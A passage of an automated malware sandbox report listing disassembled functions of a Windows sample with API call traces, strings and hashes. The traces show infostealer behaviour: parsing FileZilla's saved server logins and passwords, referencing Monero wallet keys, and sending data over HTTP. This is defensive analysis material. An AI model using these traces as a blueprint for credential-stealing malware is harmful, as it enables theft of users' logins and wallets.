                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6210e74bef3a057591b9e9f0e27233bf7dbb38ac0db23044629f57cd2c500e44
                      • Instruction ID: 8698bb78651dc1313550fbb337d271aa5aa256260bc8bc929cc55b86d4f4de1b
                      • Opcode Fuzzy Hash: 6210e74bef3a057591b9e9f0e27233bf7dbb38ac0db23044629f57cd2c500e44
                      • Instruction Fuzzy Hash: 915138F3A142044BF3149E29DC9477AB7D6DBD4320F2B863DDAC8C7380E93988168296
                      Function 00904F23 Relevance: .1, Instructions: 147COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8fd1936a50de725f4f3f01fa8abed13dab9685675b2e289e2682fa704abb59f6
                      • Instruction ID: 518ec1309f789a7193e597bc110852e25af6e372a70ff2d709c6181480eeb21a
                      • Opcode Fuzzy Hash: 8fd1936a50de725f4f3f01fa8abed13dab9685675b2e289e2682fa704abb59f6
                      • Instruction Fuzzy Hash: 3541D2F3A182105FF354997CEC89727B6D6DB84324F26863DDB98D77C8E97948048286
                      Function 00A2F23F Relevance: .1, Instructions: 109COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2d82d58ef7a3c7e9137191ff6c2f6e87a5334df5c703b0f207c791ebbe654d34
                      • Instruction ID: 9155905f39ecd2d5da784064e861bf1e214400c1ce2445cc9729dce8d3dff6d6
                      • Opcode Fuzzy Hash: 2d82d58ef7a3c7e9137191ff6c2f6e87a5334df5c703b0f207c791ebbe654d34
                      • Instruction Fuzzy Hash: 9531E35A05D7E28FC3138B382CB96D27FA06D132243998AEFC4C54F987E256941AC3D6
                      Function 00559750 Relevance: .0, Instructions: 15COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                      Function 00550250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                        • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                        • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                        • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                        • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                        • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                        • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                      • GetProcessHeap.KERNEL32(00000000,000F423F,00560DBA,00560DB7,00560DB6,00560DB3), ref: 00550362
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00550369
                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00550385
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550393
                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 005503CF
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 005503DD
                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00550419
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550427
                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00550463
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550475
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550502
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055051A
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550532
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055054A
                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00550562
                      • lstrcat.KERNEL32(?,profile: null), ref: 00550571
                      • lstrcat.KERNEL32(?,url: ), ref: 00550580
                      • lstrcat.KERNEL32(?,00000000), ref: 00550593
                      • lstrcat.KERNEL32(?,00561678), ref: 005505A2
                      • lstrcat.KERNEL32(?,00000000), ref: 005505B5
                      • lstrcat.KERNEL32(?,0056167C), ref: 005505C4
                      • lstrcat.KERNEL32(?,login: ), ref: 005505D3
                      • lstrcat.KERNEL32(?,00000000), ref: 005505E6
                      • lstrcat.KERNEL32(?,00561688), ref: 005505F5
                      • lstrcat.KERNEL32(?,password: ), ref: 00550604
                      • lstrcat.KERNEL32(?,00000000), ref: 00550617
                      • lstrcat.KERNEL32(?,00561698), ref: 00550626
                      • lstrcat.KERNEL32(?,0056169C), ref: 00550635
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055068E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                      • API String ID: 1942843190-555421843
                      • Opcode ID: ee2519b335a04e0b6a811b7e58a98fcefcf3764309a048c0365b3333347f36aa
                      • Instruction ID: e29c9a3873239849eef93dc7880719ba82b00414a30ff522d6a38a78035134d1
                      • Opcode Fuzzy Hash: ee2519b335a04e0b6a811b7e58a98fcefcf3764309a048c0365b3333347f36aa
                      • Instruction Fuzzy Hash: 79D14271900109ABDB04EBF0DDAAEEE7B38FF54301F54851AF502A7091EF34AA49CB65
                      Function 00545960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                        • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005459F8
                      • StrCmpCA.SHLWAPI(?,0102FC80), ref: 00545A13
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00545B93
                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0102FCE0,00000000,?,0102E8C0,00000000,?,00561A1C), ref: 00545E71
                      • lstrlen.KERNEL32(00000000), ref: 00545E82
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00545E93
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00545E9A
                      • lstrlen.KERNEL32(00000000), ref: 00545EAF
                      • lstrlen.KERNEL32(00000000), ref: 00545ED8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00545EF1
                      • lstrlen.KERNEL32(00000000,?,?), ref: 00545F1B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00545F2F
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00545F4C
                      • InternetCloseHandle.WININET(00000000), ref: 00545FB0
                      • InternetCloseHandle.WININET(00000000), ref: 00545FBD
                      • HttpOpenRequestA.WININET(00000000,0102FC40,?,0102F320,00000000,00000000,00400100,00000000), ref: 00545BF8
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • InternetCloseHandle.WININET(00000000), ref: 00545FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 874700897-2180234286
                      • Opcode ID: 97f92194595b95b418bcfb8e69e589836811c0ef5423fffe0cb828fac3a750a5
                      • Instruction ID: 8ad5a94d018e408df316efedd909fa5e958029e50f61bca5fc188f89622436cf
                      • Opcode Fuzzy Hash: 97f92194595b95b418bcfb8e69e589836811c0ef5423fffe0cb828fac3a750a5
                      • Instruction Fuzzy Hash: E3122172820119ABDB15EBA0DCA9FEE7778BF54701F50429AB50663091EF303A4DCF65
                      Function 0054CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0102EBC0,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054CF83
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0054D0C7
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0054D0CE
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D208
                      • lstrcat.KERNEL32(?,00561478), ref: 0054D217
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D22A
                      • lstrcat.KERNEL32(?,0056147C), ref: 0054D239
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D24C
                      • lstrcat.KERNEL32(?,00561480), ref: 0054D25B
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D26E
                      • lstrcat.KERNEL32(?,00561484), ref: 0054D27D
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D290
                      • lstrcat.KERNEL32(?,00561488), ref: 0054D29F
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D2B2
                      • lstrcat.KERNEL32(?,0056148C), ref: 0054D2C1
                      • lstrcat.KERNEL32(?,00000000), ref: 0054D2D4
                      • lstrcat.KERNEL32(?,00561490), ref: 0054D2E3
                        • Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
                        • Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885
                      • lstrlen.KERNEL32(?), ref: 0054D32A
                      • lstrlen.KERNEL32(?), ref: 0054D339
                        • Part of subcall function 0055AA70: StrCmpCA.SHLWAPI(01028A68,0054A7A7,?,0054A7A7,01028A68), ref: 0055AA8F
                      • DeleteFileA.KERNEL32(00000000), ref: 0054D3B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                      • String ID:
                      • API String ID: 1956182324-0
                      • Opcode ID: 49d962d7b9af3f22f201e5e25406f18e3787043eb4719ac6b23672f307a50a2a
                      • Instruction ID: b935c6ed5079849d7691eaae95da84aee22555b477b62024906217a08e8eabf1
                      • Opcode Fuzzy Hash: 49d962d7b9af3f22f201e5e25406f18e3787043eb4719ac6b23672f307a50a2a
                      • Instruction Fuzzy Hash: BCE15571950109ABDB04EBA0DD69EEE7B78BF54302F104156F507A7091EE38BE09CB76
                      Function 0054C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0102DAD8,00000000,?,0056144C,00000000,?,?), ref: 0054CA6C
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0054CA89
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0054CA95
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0054CAA8
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0054CAD9
                      • StrStrA.SHLWAPI(?,0102DAF0,00560B52), ref: 0054CAF7
                      • StrStrA.SHLWAPI(00000000,0102DB20), ref: 0054CB1E
                      • StrStrA.SHLWAPI(?,0102E468,00000000,?,00561458,00000000,?,00000000,00000000,?,01028A58,00000000,?,00561454,00000000,?), ref: 0054CCA2
                      • StrStrA.SHLWAPI(00000000,0102E6C8), ref: 0054CCB9
                        • Part of subcall function 0054C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0054C871
                        • Part of subcall function 0054C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0054C87C
                      • StrStrA.SHLWAPI(?,0102E6C8,00000000,?,0056145C,00000000,?,00000000,010288A8), ref: 0054CD5A
                      • StrStrA.SHLWAPI(00000000,01028B58), ref: 0054CD71
                        • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B46), ref: 0054C943
                        • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B47), ref: 0054C957
                        • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B4E), ref: 0054C978
                      • lstrlen.KERNEL32(00000000), ref: 0054CE44
                      • CloseHandle.KERNEL32(00000000), ref: 0054CE9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
